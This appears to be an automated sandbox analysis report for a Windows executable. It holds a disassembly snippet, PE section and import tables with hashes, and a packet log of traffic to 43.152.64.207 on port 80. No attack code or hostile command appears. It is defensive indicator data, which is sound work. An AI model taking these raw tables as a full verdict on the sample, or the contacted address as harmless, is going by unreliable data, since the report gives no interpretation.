mov edi, eax
jmp 00007F20B0C99508h
dec eax
mov edi, eax
dec eax
mov eax, dword ptr [esi+10h]
dec eax
dec dword ptr [eax]
jne 00007F20B0C994FBh
dec eax
lea ecx, dword ptr [esi+10h]
call 00007F20B0C9A104h
dec eax
cmp dword ptr [esi+18h], 00000000h
je 00007F20B0C99502h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3f1000	0x2a28	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7c0000	0x1fd5c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x39d000	0x14ab4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3f6000	0x6b8c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x39bc00	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3f1988	0x870	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2a2308	0x2a2400	47bd59b9229067d506e02af3593741a0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x2a4000	0x4b20	0x4c00	50b43ec8f96c670eb5351afb9ff0ac77	False	0.1934107730263158	data	3.0468417634263845	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x2a9000	0xf30c0	0xf3200	a5650fc5122296fed1beac9e91b77340	False	0.39393276028277635	data	5.795865088688777	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x39d000	0x14ab4	0x14c00	22b2aa86141ae31593de49a2a38a5df0	False	0.5408979668674698	data	6.284079374442368	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0x3b2000	0x3d6e0	0x3d800	d1ca5d279e3fb8bd83177d4ce6154bfb	False	0.3799145706300813	data	5.5176159840941885	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x3f0000	0x35c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x3f1000	0x2a28	0x2c00	58da8ef6cf7ca18450f41bc2b4df7776	False	0.2871981534090909	data	4.600020334249594	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x3f4000	0x70	0x200	cfc4e01a591ad3af158ecfc8c9084f5f	False	0.087890625	data	0.4965832874032078	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x3f5000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x3f6000	0x6b8c	0x6c00	6e49b1bd9739a35f11c9e47d8cccebdd	False	0.3894675925925926	data	5.461172086132102	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/4	0x3fd000	0x260	0x400	8e12ad910bb52953a7674076653d2395	False	0.1884765625	data	1.647926430903545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/19	0x3fe000	0x9b4d6	0x9b600	5ad3a155317bf826b2f573486a2a6b6d	False	0.12735694891391794	MIPSEB Ucode	5.0979263844548415	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/35	0x49a000	0xe2609	0xe2800	7e0e92d75ad4446818f0c2cd85d14cbb	False	0.38028162941501104	data	5.525743478893564	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/47	0x57d000	0x13f1	0x1400	937541e4121ed480a0a0fa607719bf64	False	0.2408203125	data	4.899277134046503	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/61	0x57f000	0x5b404	0x5b600	bb0db003b78bf4c81f758bca78598de2	False	0.39663667065663477	data	5.96257372269237	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/73	0x5db000	0x2e0	0x400	7be1913c70c067213003fd3fe145784e	False	0.3447265625	data	2.8864613157715078	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/86	0x5dc000	0x15106b	0x151200	deef478bf5fb15e418fc3e2de1d539cf	False	0.17364852729885058	data	5.384084445449517	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/97	0x72e000	0x10e	0x200	5c08cacbdf4071bce793c7c0e033b7a4	False	0.244140625	data	1.6221371847887087	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/113	0x72f000	0x8eab0	0x8ec00	b62a07db96f4a7c8651b2eb44ed6f7a8	False	0.10461532672942207	data	2.4961799056096816	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/127	0x7be000	0x3e9	0x400	55ab218550afaef32cf682ad9b627bb9	False	0.5302734375	data	4.566407064601656	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/143	0x7bf000	0x17	0x200	b2332f3b7c1b892bb88709de3af56034	False	0.064453125	Spectrum .TAP data "\005 " - BASIC program	0.2475781363955928	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x7c0000	0x1fd5c	0x1fe00	a612311fd13e1d7e58a0892fb90cd6ed	False	0.9930606617647059	data	7.987465165032339	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x7c01ec	0x46	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced			0.9428571428571428
RT_ICON	0x7c0234	0x46	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced			0.9428571428571428
RT_ICON	0x7c027c	0x46	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced			0.9428571428571428
RT_ICON	0x7c02c4	0x46	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced			0.9428571428571428
RT_ICON	0x7c030c	0x46	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced			0.9428571428571428
RT_ICON	0x7c0354	0x1f773	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			1.0003569128589496
RT_GROUP_ICON	0x7dfac8	0x5a	data			0.4888888888888889
RT_VERSION	0x7dfb24	0x238	data	English	United States	0.4982394366197183

Imports

DLL	Import
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, InitializeCriticalSection, LeaveCriticalSection, RaiseException, RtlUnwindEx, VirtualProtect, VirtualQuery, __C_specific_handler
msvcrt.dll	__getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _commode, _fmode, _fpreset, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcmp, memcpy, memmove, memset, signal, strlen, strncmp, vfprintf
advapi32.dll	CryptAcquireContextW, CryptDestroyKey, CryptImportKey, CryptReleaseContext, OpenProcessToken, RegCloseKey, RegEnumKeyExW, RegEnumValueW, RegOpenKeyExW, RegQueryInfoKeyW, RegQueryValueExW, SystemFunction036
bcrypt.dll	BCryptGenRandom
crypt32.dll	CertAddCertificateContextToStore, CertAddEncodedCTLToStore, CertAddEncodedCertificateToStore, CertCloseStore, CertCreateCTLEntryFromCertificateContextProperties, CertCreateCertificateContext, CertDeleteCertificateFromStore, CertDuplicateCertificateChain, CertDuplicateCertificateContext, CertDuplicateStore, CertEnumCertificatesInStore, CertFreeCTLContext, CertFreeCertificateChain, CertFreeCertificateContext, CertGetCertificateChain, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertOpenStore, CertSetCertificateContextProperty, CertVerifyCertificateChainPolicy, CertVerifyTimeValidity, CryptAcquireCertificatePrivateKey, CryptBinaryToStringA, CryptDecodeObjectEx, CryptEncodeObjectEx, CryptHashCertificate, CryptMsgEncodeAndSignCTL, CryptStringToBinaryA, PFXExportCertStore, PFXImportCertStore
kernel32.dll	AcquireSRWLockExclusive, AcquireSRWLockShared, AddVectoredExceptionHandler, CancelIo, CancelIoEx, CloseHandle, CompareStringOrdinal, ConnectNamedPipe, CopyFileExW, CreateDirectoryW, CreateEventW, CreateFileMappingA, CreateFileW, CreateHardLinkW, CreateIoCompletionPort, CreateNamedPipeW, CreateProcessW, CreateSymbolicLinkW, CreateThread, CreateToolhelp32Snapshot, CreateWaitableTimerExW, DeleteFileW, DeleteProcThreadAttributeList, DeviceIoControl, DisconnectNamedPipe, DuplicateHandle, ExitProcess, FileTimeToSystemTime, FindClose, FindFirstFileW, FindNextFileW, FlushFileBuffers, FormatMessageW, FreeConsole, FreeEnvironmentStringsW, FreeLibrary, GetCommandLineW, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetEnvironmentStringsW, GetEnvironmentVariableW, GetExitCodeProcess, GetFileAttributesW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileType, GetFinalPathNameByHandleW, GetFullPathNameW, GetLastError, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNamedPipeInfo, GetOverlappedResult, GetProcAddress, GetProcessHeap, GetProcessId, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryW, GetSystemInfo, GetSystemTimeAsFileTime, GetTempPathW, GetWindowsDirectoryW, HeapAlloc, HeapFree, HeapReAlloc, InitOnceBeginInitialize, InitOnceComplete, InitializeProcThreadAttributeList, LoadLibraryExW, LocalFree, MapViewOfFile, Module32FirstW, Module32NextW, MoveFileExW, MultiByteToWideChar, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleW, ReadFile, ReadFileEx, ReleaseSRWLockExclusive, ReleaseSRWLockShared, RemoveDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetCurrentDirectoryW, SetEnvironmentVariableW, SetFileAttributesW, SetFileCompletionNotificationModes, SetFileInformationByHandle, SetFilePointerEx, SetFileTime, SetHandleInformation, SetLastError, SetThreadErrorMode, SetThreadStackGuarantee, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SleepConditionVariableSRW, SleepEx, SwitchToThread, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnmapViewOfFile, UpdateProcThreadAttribute, WaitForMultipleObjects, WaitForSingleObject, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile, WriteFileEx
ncrypt.dll	NCryptFreeObject
ntdll.dll	NtCreateFile, NtDeviceIoControlFile, RtlNtStatusToDosError
secur32.dll	AcceptSecurityContext, AcquireCredentialsHandleA, ApplyControlToken, DecryptMessage, DeleteSecurityContext, EncryptMessage, FreeContextBuffer, FreeCredentialsHandle, InitializeSecurityContextW, QueryContextAttributesW
shell32.dll	ShellExecuteW
userenv.dll	GetUserProfileDirectoryW
ws2_32.dll	WSACleanup, WSADuplicateSocketW, WSAGetLastError, WSAIoctl, WSAPoll, WSARecv, WSARecvFrom, WSASend, WSASendMsg, WSASendTo, WSASocketW, WSAStartup, accept, bind, closesocket, connect, freeaddrinfo, getaddrinfo, getpeername, getsockname, getsockopt, ioctlsocket, listen, recv, recvfrom, select, send, sendto, setsockopt, shutdown, socket
ntdll.dll	NtCancelIoFileEx, NtReadFile, NtWriteFile

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 17, 2024 09:16:09.795121908 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:09.801132917 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:09.801312923 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:09.802190065 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:09.808403015 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.855537891 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.855560064 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.855572939 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.855629921 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:10.855922937 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.855936050 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.855946064 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.855967999 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:10.856013060 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:10.857736111 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.857759953 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.857808113 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:10.857809067 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.858716965 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.858802080 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:10.860601902 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.860615015 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.860626936 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.860640049 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.860667944 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:10.860768080 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:10.974054098 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.974082947 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.974097013 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.974109888 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.974126101 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.974237919 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:10.974237919 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:10.974710941 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.974725008 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.974737883 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.974764109 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:10.974852085 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:10.974852085 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.974931002 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.974942923 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.974998951 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:10.976866961 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.976905107 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.976917982 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:10.976944923 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:10.976969957 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.065134048 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.065151930 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.065165043 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.065210104 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.065639973 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.065676928 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.065685034 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.065721989 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.065757990 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.066489935 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.067014933 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.067038059 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.067049980 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.067068100 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.067210913 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.068694115 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.068720102 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.068731070 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.070277929 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.070332050 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.070343018 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.070343018 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.070343018 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.070481062 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.092817068 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.092830896 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.092844009 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.092886925 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.092899084 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.092911959 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.093568087 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.148081064 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.244940042 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.244957924 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.244970083 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.245084047 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.245253086 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.245266914 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.245277882 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.245290041 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.245307922 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.245316982 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.245340109 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.245378971 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.245390892 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.245403051 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.245419979 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.245428085 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.245428085 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.245474100 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.246104002 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.246114969 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.246126890 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.246161938 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.246218920 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.246239901 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.246246099 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.246277094 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.246277094 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.246923923 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.246946096 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.246958017 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.246994972 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.247014999 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.247040987 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.247054100 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.247087955 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.247087955 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.247750044 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.247796059 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.247807980 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.247878075 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.247889042 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.247900963 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.247911930 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.247944117 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.247982979 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.248629093 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.248650074 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.248662949 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.248689890 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.248764038 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.248775959 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.248788118 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.248815060 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.248862982 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.249491930 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.249541044 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.249552965 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.249605894 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.249635935 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.249649048 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.249660969 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.249695063 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.249695063 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.250422001 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.250464916 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.250477076 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.250524998 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.250557899 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.250575066 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.250586033 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.250613928 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.250622988 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.251141071 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.251209974 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.251260996 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.251264095 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.251272917 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.251286030 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.251298904 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.251337051 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.251337051 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.305382013 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.305437088 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.305449963 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.305504084 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.305516005 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.305542946 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.305552006 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.305552006 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.305556059 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.305571079 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.305582047 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.305596113 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.305605888 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.305605888 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.305653095 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.306333065 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.306430101 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.306441069 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.306541920 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.306633949 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.306646109 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.306660891 CEST	80	49705	43.152.64.207	192.168.2.8
Oct 17, 2024 09:16:11.306703091 CEST	49705	80	192.168.2.8	43.152.64.207
Oct 17, 2024 09:16:11.306703091 CEST	49705	80	192.168.2.8	43.152.64.207
